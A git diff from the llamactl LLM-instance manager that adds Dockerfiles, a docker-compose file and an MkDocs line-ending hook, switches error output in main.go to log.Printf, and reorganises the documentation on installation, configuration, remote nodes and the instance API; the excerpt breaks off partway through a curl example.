enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g", "-v", "~/.local/share/llamactl/huggingface:/root/.cache/huggingface"]
environment: {} # Environment variables for the container
mlx:

View File

@@ -5,6 +5,7 @@ import (
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"log"
"net/http"
"os"
"os/signal"
@@ -22,6 +23,9 @@ var buildTime string = "unknown"
// @license.name MIT License
// @license.url https://opensource.org/license/mit/
// @basePath /api/v1
// @securityDefinitions.apikey ApiKeyAuth
// @in header
// @name X-API-Key
func main() {
// --version flag to print the version
@@ -35,8 +39,7 @@ func main() {
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
log.Printf("Error loading config: %v\nUsing default configuration.", err)
}
// Set version information
@@ -47,18 +50,16 @@ func main() {
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
log.Printf("Error creating config directory %s: %v\nPersistence will not be available.", cfg.Instances.InstancesDir, err)
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
log.Printf("Error creating log directory %s: %v\nInstance logs will not be available.", cfg.Instances.LogsDir, err)
}
}
// Initialize the instance manager
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
instanceManager := manager.New(&cfg)
// Create a new handler with the instance manager
handler := server.NewHandler(instanceManager, cfg)
@@ -78,7 +79,7 @@ func main() {
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
log.Printf("Error starting server: %v\n", err)
}
}()
@@ -87,7 +88,7 @@ func main() {
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
log.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}

View File

@@ -0,0 +1,23 @@
FROM ghcr.io/ggml-org/llama.cpp:server-cuda
# Install curl for downloading llamactl
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
# Download and install the latest llamactl release
RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
mv llamactl /usr/local/bin/ && \
chmod +x /usr/local/bin/llamactl
# Set working directory
RUN mkdir -p /data
WORKDIR /data
# Expose the default llamactl port
EXPOSE 8080
ENV LLAMACTL_LLAMACPP_COMMAND=/app/llama-server
ENV LD_LIBRARY_PATH="/app:/usr/local/lib:/usr/lib"
# Set llamactl as the entrypoint
ENTRYPOINT ["llamactl"]

64
docker/Dockerfile.source Normal file
View File

@@ -0,0 +1,64 @@
# WebUI build stage
FROM node:20-alpine AS webui-builder
WORKDIR /webui
# Copy webui package files
COPY webui/package*.json ./
# Install dependencies
RUN npm ci
# Copy webui source
COPY webui/ ./
# Build webui
RUN npm run build
# Go build stage
FROM golang:1.24-alpine AS builder
# Install build dependencies
RUN apk add --no-cache git ca-certificates
# Set working directory
WORKDIR /build
# Copy go mod files
COPY go.mod go.sum ./
# Download dependencies
RUN go mod download
# Copy source code
COPY cmd/ ./cmd/
COPY pkg/ ./pkg/
COPY docs/ ./docs/
COPY webui/webui.go ./webui/
# Copy built webui from webui-builder
COPY --from=webui-builder /webui/dist ./webui/dist
# Build the application
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags="-w -s" -o llamactl ./cmd/server
# Final stage
FROM alpine:latest
# Install runtime dependencies
RUN apk --no-cache add ca-certificates
# Create data directory
RUN mkdir -p /data
# Set working directory
WORKDIR /data
# Copy binary from builder
COPY --from=builder /build/llamactl /usr/local/bin/llamactl
# Expose the default port
EXPOSE 8080
# Set llamactl as the entrypoint
ENTRYPOINT ["llamactl"]

20
docker/Dockerfile.vllm Normal file
View File

@@ -0,0 +1,20 @@
FROM vllm/vllm-openai:latest
# Install curl for downloading llamactl
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
# Download and install the latest llamactl release
RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
mv llamactl /usr/local/bin/ && \
chmod +x /usr/local/bin/llamactl
# Set working directory
RUN mkdir -p /data
WORKDIR /data
# Expose the default llamactl port
EXPOSE 8080
# Set llamactl as the entrypoint
ENTRYPOINT ["llamactl"]

56
docker/docker-compose.yml Normal file
View File

@@ -0,0 +1,56 @@
version: '3.8'
services:
llamactl-llamacpp:
build:
context: ..
dockerfile: docker/Dockerfile.llamacpp
image: llamactl:llamacpp-cuda
container_name: llamactl-llamacpp
ports:
- "8080:8080"
volumes:
- ./data/llamacpp:/data
- ./models:/models # Mount models directory
- ~/.cache/llama.cpp:/root/.cache/llama.cpp # Llama.cpp cache
environment:
# Set data directory for persistence
- LLAMACTL_DATA_DIR=/data
# Enable Docker mode for nested containers (if needed)
- LLAMACTL_LLAMACPP_DOCKER_ENABLED=false
deploy:
resources:
reservations:
devices:
- driver: nvidia
count: all
capabilities: [gpu]
restart: unless-stopped
llamactl-vllm:
build:
context: ..
dockerfile: docker/Dockerfile.vllm
image: llamactl:vllm-cuda
container_name: llamactl-vllm
ports:
- "8081:8080" # Use different port to avoid conflicts
volumes:
- ./data/vllm:/data
- ./models:/models # Mount models directory
- ~/.cache/huggingface:/root/.cache/huggingface # HuggingFace cache
environment:
# Set data directory for persistence
- LLAMACTL_DATA_DIR=/data
# Enable Docker mode for nested containers (if needed)
- LLAMACTL_VLLM_DOCKER_ENABLED=false
# vLLM specific environment variables
- CUDA_VISIBLE_DEVICES=all
deploy:
resources:
reservations:
devices:
- driver: nvidia
count: all
capabilities: [gpu]
restart: unless-stopped

View File

@@ -1,5 +1,6 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0
mkdocs-material==9.6.22
mkdocs==1.6.1
pymdown-extensions==10.16.1
mkdocs-git-revision-date-localized-plugin==1.4.7
mike==2.1.3
neoteroi-mkdocs==1.1.3

1
docs/api-reference.md Normal file
View File

@@ -0,0 +1 @@
[OAD(swagger.yaml)]

View File

@@ -17,33 +17,37 @@ server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
allowed_headers: ["*"] # Allowed CORS headers (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
response_headers: {} # Additional response headers to send with responses
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
response_headers: {} # Additional response headers to send with responses
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
response_headers: {} # Additional response headers to send with responses
instances:
port_range: [8000, 9000] # Port range for instances
@@ -66,13 +70,17 @@ auth:
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
local_node: "main" # Name of the local node (default: "main")
nodes: # Node configuration for multi-node deployment
main: # Default local node (empty config)
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
Configuration files are searched in the following locations (in order of precedence, first found is used):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
@@ -101,6 +109,7 @@ server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
allowed_headers: ["*"] # CORS allowed headers (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
@@ -116,40 +125,46 @@ backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
response_headers: {} # Additional response headers to send with responses
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
enabled: false # Enable Docker runtime (default: false)
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
response_headers: {} # Additional response headers to send with responses
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
# MLX does not support Docker
response_headers: {} # Additional response headers to send with responses
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `response_headers`: Additional response headers to send with responses (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
> If llamactl is behind an NGINX proxy, `X-Accel-Buffering: no` response header may be required for NGINX to properly stream the responses without buffering.
**Environment Variables:**
**LlamaCpp Backend:**
@@ -160,6 +175,7 @@ backends:
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
@@ -169,11 +185,13 @@ backends:
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_MLX_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
### Instance Configuration
@@ -221,18 +239,32 @@ auth:
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
### Remote Node Configuration
View all available command line options:
llamactl supports remote node deployments. Configure remote nodes to deploy instances on remote hosts and manage them centrally.
```bash
llamactl --help
```yaml
local_node: "main" # Name of the local node (default: "main")
nodes: # Node configuration map
main: # Local node (empty address means local)
address: "" # Not used for local node
api_key: "" # Not used for local node
worker1: # Remote worker node
address: "http://192.168.1.10:8080"
api_key: "worker1-api-key" # Management API key for authentication
```
You can also override configuration using command line flags when starting llamactl.
**Node Configuration Fields:**
- `local_node`: Specifies which node in the `nodes` map represents the local node. Must match exactly what other nodes call this node.
- `nodes`: Map of node configurations
- `address`: HTTP/HTTPS URL of the remote node (empty for local node)
- `api_key`: Management API key for authenticating with the remote node
**Environment Variables:**
- `LLAMACTL_LOCAL_NODE` - Name of the local node

1814
docs/css/css-v1.1.3.css Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

60
docs/fix_line_endings.py Normal file
View File

@@ -0,0 +1,60 @@
"""
MkDocs hook to fix line endings for proper rendering.
Automatically adds two spaces at the end of lines that need line breaks.
"""
import re
def on_page_markdown(markdown, page, config, **kwargs):
"""
Fix line endings in markdown content for proper MkDocs rendering.
Adds two spaces at the end of lines that need line breaks.
"""
lines = markdown.split('\n')
processed_lines = []
in_code_block = False
for i, line in enumerate(lines):
stripped = line.strip()
# Track code blocks
if stripped.startswith('```'):
in_code_block = not in_code_block
processed_lines.append(line)
continue
# Skip processing inside code blocks
if in_code_block:
processed_lines.append(line)
continue
# Skip empty lines
if not stripped:
processed_lines.append(line)
continue
# Skip lines that shouldn't have line breaks:
# - Headers (# ## ###)
# - Blockquotes (>)
# - Table rows (|)
# - Lines already ending with two spaces
# - YAML front matter and HTML tags
# - Standalone punctuation lines
if (stripped.startswith('#') or
stripped.startswith('>') or
'|' in stripped or
line.endswith(' ') or
stripped.startswith('---') or
stripped.startswith('<') or
stripped.endswith('>') or
stripped in ('.', '!', '?', ':', ';', '```', '---', ',')):
processed_lines.append(line)
continue
# Add two spaces to lines that end with regular text or most punctuation
if stripped and not in_code_block:
processed_lines.append(line.rstrip() + ' ')
else:
processed_lines.append(line)
return '\n'.join(processed_lines)

View File

@@ -1,105 +0,0 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -1,190 +0,0 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

Before

Width:  |  Height:  |  Size: 69 KiB

After

Width:  |  Height:  |  Size: 66 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 31 KiB

After

Width:  |  Height:  |  Size: 45 KiB

View File

@@ -14,20 +14,20 @@ Welcome to the Llamactl documentation!
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
- [Installation Guide](installation.md) - Get Llamactl up and running
- [Configuration Guide](configuration.md) - Detailed configuration options
- [Quick Start](quick-start.md) - Your first steps with Llamactl
- [Managing Instances](managing-instances.md) - Instance lifecycle management
- [API Reference](api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Check the [Troubleshooting](troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
- Review the [Configuration Guide](configuration.md) for advanced settings
## License

174
docs/installation.md Normal file
View File

@@ -0,0 +1,174 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install in a virtual environment
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Docker
llamactl provides Dockerfiles for creating Docker images with backends pre-installed. The resulting images include the latest llamactl release with the respective backend.
**Available Dockerfiles (CUDA):**
- **llamactl with llama.cpp CUDA**: `docker/Dockerfile.llamacpp` (based on `ghcr.io/ggml-org/llama.cpp:server-cuda`)
- **llamactl with vLLM CUDA**: `docker/Dockerfile.vllm` (based on `vllm/vllm-openai:latest`)
- **llamactl built from source**: `docker/Dockerfile.source` (multi-stage build with webui)
**Note:** These Dockerfiles are configured for CUDA. For other platforms (CPU, ROCm, Vulkan, etc.), adapt the base image. For llama.cpp, see available tags at [llama.cpp Docker docs](https://github.com/ggml-org/llama.cpp/blob/master/docs/docker.md). For vLLM, check [vLLM docs](https://docs.vllm.ai/en/v0.6.5/serving/deploying_with_docker.html).
**Using Docker Compose**
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Create directories for data and models
mkdir -p data/llamacpp data/vllm models
# Start llamactl with llama.cpp backend
docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
# Or start llamactl with vLLM backend
docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
```
Access the dashboard at:
- llamactl with llama.cpp: http://localhost:8080
- llamactl with vLLM: http://localhost:8081
**Using Docker Build and Run**
1. llamactl with llama.cpp CUDA:
```bash
docker build -f docker/Dockerfile.llamacpp -t llamactl:llamacpp-cuda .
docker run -d \
--name llamactl-llamacpp \
--gpus all \
-p 8080:8080 \
-v ~/.cache/llama.cpp:/root/.cache/llama.cpp \
llamactl:llamacpp-cuda
```
2. llamactl with vLLM CUDA:
```bash
docker build -f docker/Dockerfile.vllm -t llamactl:vllm-cuda .
docker run -d \
--name llamactl-vllm \
--gpus all \
-p 8080:8080 \
-v ~/.cache/huggingface:/root/.cache/huggingface \
llamactl:vllm-cuda
```
3. llamactl built from source:
```bash
docker build -f docker/Dockerfile.source -t llamactl:source .
docker run -d \
--name llamactl \
-p 8080:8080 \
llamactl:source
```
### Option 3: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Remote Node Installation
For deployments with remote nodes:
- Install llamactl on each node using any of the methods above
- Configure API keys for authentication between nodes
- Ensure node names are consistent across all configurations
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
For remote node deployments, see the [Configuration Guide](configuration.md) for node setup instructions.

View File

@@ -9,13 +9,17 @@ Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
![Dashboard Screenshot](images/dashboard.png)
### Authentication
If authentication is enabled:
Llamactl uses a **Management API Key** to authenticate requests to the management API (creating, starting, stopping instances). All curl examples below use `<token>` as a placeholder - replace this with your actual Management API Key.
By default, authentication is required. If you don't configure a management API key in your configuration file, llamactl will auto-generate one and print it to the terminal on startup. See the [Configuration](configuration.md) guide for details.
For Web UI access:
1. Navigate to the web UI
2. Enter your credentials
2. Enter your Management API Key
3. Bearer token is stored for the session
### Theme Support
@@ -33,39 +37,46 @@ Each instance is displayed as a card showing:
## Create Instance
### Via Web UI
**Via Web UI**
![Create Instance Screenshot](../images/create_instance.png)
![Create Instance Screenshot](images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. *Optional*: Click **"Import"** in the dialog header to load a previously exported configuration
2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
3. **Select Target Node**: Choose which node to deploy the instance to from the dropdown
4. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
5. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
6. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
7. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
!!! tip "Auto-Assignment"
Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
8. Click **"Create"** to save the instance
**Via API**
```bash
# Create llama.cpp instance with local model file
curl -X POST http://localhost:8080/api/instances/my-llama-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-llama-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
@@ -73,12 +84,14 @@ curl -X POST http://localhost:8080/api/instances/my-llama-instance \
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
},
"nodes": ["main"]
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
@@ -88,12 +101,14 @@ curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
"max_restarts": 3,
"nodes": ["main"]
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "vllm",
"backend_options": {
@@ -107,60 +122,92 @@ curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
},
"nodes": ["main"]
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
